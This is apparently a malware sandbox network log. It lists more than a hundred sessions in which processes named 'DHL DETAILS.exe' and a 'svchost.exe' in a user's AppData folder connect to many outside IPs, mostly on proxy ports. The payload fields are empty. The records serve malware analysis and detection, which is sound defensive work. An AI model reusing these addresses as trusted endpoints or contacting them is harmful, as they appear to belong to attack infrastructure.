Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6208	192.168.2.5	62693	62.243.56.95	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6209	192.168.2.5	55223	18.167.191.223	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6210	192.168.2.5	58435	162.240.22.184	48026	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6211	192.168.2.5	55321	162.214.75.79	52163	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6212	192.168.2.5	58326	107.180.90.88	64081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6213	192.168.2.5	58342	128.199.221.91	17532	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6214	192.168.2.5	58454	162.214.164.200	42624	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6215	192.168.2.5	58423	203.74.125.18	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6216	192.168.2.5	58738	185.81.153.162	3389	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6217	192.168.2.5	58535	195.248.243.149	7237	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6218	192.168.2.5	56360	142.54.232.6	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6219	192.168.2.5	49334	142.44.210.174	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6220	192.168.2.5	58714	43.255.113.232	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6221	192.168.2.5	58716	106.105.218.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6222	192.168.2.5	55475	162.214.102.195	34227	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6223	192.168.2.5	62794	162.241.158.204	50563	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6224	192.168.2.5	58718	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6225	192.168.2.5	55351	200.10.73.210	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6226	192.168.2.5	55409	144.24.77.90	55555	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6227	192.168.2.5	55862	208.87.131.240	22566	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6228	192.168.2.5	60962	104.37.135.145	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6229	192.168.2.5	61537	46.17.63.166	9480	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6230	192.168.2.5	61095	164.92.86.113	64110	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6231	192.168.2.5	61578	45.120.178.197	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6232	192.168.2.5	61570	134.209.105.209	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6233	192.168.2.5	61583	121.159.146.251	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6234	192.168.2.5	61099	35.237.210.215	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6235	192.168.2.5	61598	120.48.62.239	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6236	192.168.2.5	61605	103.23.100.1	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6237	192.168.2.5	61625	119.196.168.183	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6238	192.168.2.5	61606	222.223.103.232	7302	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6239	192.168.2.5	61150	88.198.82.189	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6240	192.168.2.5	61626	45.138.87.238	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6241	192.168.2.5	61624	190.128.228.182	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6242	192.168.2.5	55514	212.47.245.57	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6243	192.168.2.5	58743	49.4.48.128	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6244	192.168.2.5	58756	203.218.172.225	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6245	192.168.2.5	58764	8.217.143.187	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6246	192.168.2.5	58768	39.105.27.30	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6247	192.168.2.5	58625	51.210.223.9	3000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6248	192.168.2.5	58771	138.36.150.15	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6249	192.168.2.5	58773	139.129.162.65	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6250	192.168.2.5	58782	89.218.8.152	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6251	192.168.2.5	56423	92.204.134.38	29718	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6252	192.168.2.5	55969	199.58.184.97	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6253	192.168.2.5	62869	176.236.163.37	59311	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6254	192.168.2.5	56895	64.44.139.12	20037	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6255	192.168.2.5	57248	166.62.38.100	2453	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6256	192.168.2.5	56341	46.101.186.238	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6257	192.168.2.5	56928	146.59.147.11	62801	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6258	192.168.2.5	49597	37.187.77.58	49507	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6259	192.168.2.5	49558	37.187.73.7	16113	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6260	192.168.2.5	49606	192.145.228.212	8081	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6261	192.168.2.5	49913	190.5.77.211	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6262	192.168.2.5	50333	149.102.130.120	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6263	192.168.2.5	58040	195.98.93.234	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6264	192.168.2.5	57866	119.18.146.114	5020	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6265	192.168.2.5	58795	104.25.194.175	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6266	192.168.2.5	58113	45.117.179.240	8520	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6267	192.168.2.5	58796	193.239.58.92	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6268	192.168.2.5	58148	92.204.134.38	15393	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6269	192.168.2.5	58251	45.6.224.254	999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6270	192.168.2.5	58308	192.69.57.1	16099	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6271	192.168.2.5	50936	51.222.241.157	22538	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6272	192.168.2.5	58755	211.93.2.190	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6273	192.168.2.5	55696	51.161.131.84	58612	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6274	192.168.2.5	49412	5.45.73.25	8398	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6275	192.168.2.5	56137	180.191.254.127	8082	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6276	192.168.2.5	55907	47.93.113.251	3129	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6277	192.168.2.5	49395	46.47.197.210	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6278	192.168.2.5	56772	104.200.135.46	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6279	192.168.2.5	56304	207.244.241.165	60402	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6280	192.168.2.5	56400	162.214.121.173	64579	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6281	192.168.2.5	62920	192.163.202.88	47585	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6282	192.168.2.5	49404	104.225.220.233	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6283	192.168.2.5	56116	102.130.125.86	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6284	192.168.2.5	62929	39.109.113.97	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6285	192.168.2.5	62942	51.89.173.40	17982	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6286	192.168.2.5	63001	75.119.145.169	16216	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6287	192.168.2.5	56286	82.223.121.72	15464	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6288	192.168.2.5	50473	54.36.122.16	29796	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6289	192.168.2.5	50979	18.166.142.180	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6290	192.168.2.5	56624	51.79.87.144	54395	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6291	192.168.2.5	58894	23.152.40.14	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6292	192.168.2.5	58871	184.170.249.65	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6293	192.168.2.5	58910	199.102.107.145	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6294	192.168.2.5	58914	67.227.186.23	57676	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6295	192.168.2.5	50275	72.195.34.59	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6296	192.168.2.5	58411	5.161.231.34	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6297	192.168.2.5	58872	177.234.244.174	32213	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6298	192.168.2.5	51029	5.180.19.163	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6299	192.168.2.5	50882	202.191.127.21	8090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6300	192.168.2.5	58348	20.0.91.150	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6301	192.168.2.5	58925	186.150.207.207	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6302	192.168.2.5	58899	39.108.229.14	8002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6303	192.168.2.5	58944	195.90.216.75	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6304	192.168.2.5	58924	47.56.110.204	8989	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6305	192.168.2.5	58915	120.77.148.138	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6306	192.168.2.5	59009	45.61.188.134	44499	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6307	192.168.2.5	58707	184.181.217.220	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6308	192.168.2.5	58453	202.61.204.51	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6309	192.168.2.5	58913	116.199.168.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6310	192.168.2.5	58999	158.255.215.50	16993	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6311	192.168.2.5	59011	203.74.125.18	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6312	192.168.2.5	59054	172.67.231.3	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6313	192.168.2.5	62916	54.38.176.200	26591	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6314	192.168.2.5	49423	185.49.31.207	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6315	192.168.2.5	58988	175.183.82.221	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6316	192.168.2.5	58960	43.231.22.229	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6317	192.168.2.5	49468	104.238.111.107	28394	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6318	192.168.2.5	58721	140.238.25.255	21000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6319	192.168.2.5	59104	45.14.174.148	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6320	192.168.2.5	59114	104.16.230.163	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6321	192.168.2.5	59142	104.16.105.207	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6322	192.168.2.5	58945	72.49.49.11	31034	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6323	192.168.2.5	59042	203.218.172.225	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6324	192.168.2.5	58744	199.102.106.94	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6325	192.168.2.5	58645	111.53.178.249	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6326	192.168.2.5	49456	189.142.126.220	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6327	192.168.2.5	49452	194.31.79.75	50920	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6328	192.168.2.5	58719	219.71.216.78	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6329	192.168.2.5	59127	208.87.131.240	41368	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6330	192.168.2.5	59053	8.217.143.187	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6331	192.168.2.5	59056	51.210.223.9	3000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6332	192.168.2.5	49470	92.204.134.38	52929	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6333	192.168.2.5	59169	199.102.107.145	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6334	192.168.2.5	59057	193.239.58.92	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6335	192.168.2.5	59155	198.44.255.3	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6336	192.168.2.5	59143	41.111.243.18	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6337	192.168.2.5	59046	94.20.183.172	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6338	192.168.2.5	59077	128.199.165.63	33574	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6339	192.168.2.5	59100	167.172.86.46	10471	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6340	192.168.2.5	59103	45.11.95.165	6039	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6341	192.168.2.5	59157	187.40.1.123	128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6342	192.168.2.5	59193	184.170.249.65	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6343	192.168.2.5	63130	37.187.77.58	19767	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6344	192.168.2.5	57262	203.222.24.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6345	192.168.2.5	63094	112.5.128.78	8060	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6346	192.168.2.5	63149	75.119.145.169	61344	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6347	192.168.2.5	63141	148.66.130.53	54209	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6348	192.168.2.5	63168	148.66.130.53	7830	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
